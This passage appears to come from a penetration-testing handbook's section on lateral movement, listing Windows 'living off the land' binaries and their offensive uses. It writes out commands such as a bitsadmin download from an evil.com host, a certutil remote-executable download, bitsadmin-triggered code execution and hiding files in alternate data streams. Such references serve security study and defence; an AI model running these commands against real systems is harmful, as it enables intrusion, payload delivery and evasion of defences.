6.1.5. Lateral movement

6.1.5.1. Common Entry

  • SMB weak passwords

  • SqlServer weak passwords

6.1.5.2. LOLBAS

6.1.5.2.1. Introduction

LOLBAS,the full name is Living Off The Land Binaries and Scripts (and also Libraries),is a white use method,which was discovered by Christopher Campbell and Matt Graeber in 2013,and finally proposed by Philip Goh.

These programs are generally signed by Microsoft or third-party certification agencies, but in addition to completing normal functions, they can also be used for intranet penetration. These programs may be used to: download security malicious programs, execute malicious code, bypass UAC, bypass program control, etc.

6.1.5.2.2. Common procedures

  • appsyncvpublishing.exe

    • execute powershell

  • bitsadmin.exe

    • download file bitsadmin /transfer <job_name> /priority <priority> <remote_path> <local_path>

    • download file bitsadmin /create 1 bitsadmin /addfile 1 https://evil.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1

    • copy file bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset

    • code execution bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset

  • cdb.exe

  • certutil.exe

    • Certificates can be installed, backed up, deleted, managed and executed

    • Certificate store related functions

    • download file certutil -urlcache -split -f https://addr/example.exe

    • Note that certutil has a cache and needs to be deleted explicitly

    • base64 codec certutil -encode / certutil -decode

  • cmd.exe

  • cmstp.exe

  • control.exe
  • csc.exe

    • Compile the C# payload

  • cscript.exe

    • execute script

  • extexport.exe

  • expand.exe

    • Expand one or more compressed files

  • forfiles.exe

    • forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe

  • mofcomp.exe

  • makecab.exe

  • msbuild.exe

    • Build the app

  • mshta.exe

    • HTML application

  • msiexec.exe

    • install msi

    • loading dll

  • msxsl.exe

    • Process XSL programs

  • netsh.exe

  • installutil.exe

    • Install/uninstall program components

  • IEExec.exe

    • .NET Framework Companion Program

  • powershell.exe

  • psexec.exe
  • reg.exe

    • Registry Console

  • regedit.exe

    • Registry modification

  • regsvr32.exe

    • Register dynamic link library/ActiveX control

  • rundll32.exe

    • Execute internal functions in DLL files

  • sc.exe

    • View Service Status Management

  • schtasks.exe

    • Scheduled tasks

  • shred

    • Repeatedly write files to prevent file recovery

  • type.exe

    • Use ads to hide files type <filepath> <target_file:ads>

  • wmic.exe

    • Windows Administrative Tools

  • windbg.exe

  • winrm.exe

  • wscript.exe

    • script engine

  • waitfor.exe

    • Used to synchronize computers in a network, can send or wait for signals on the system。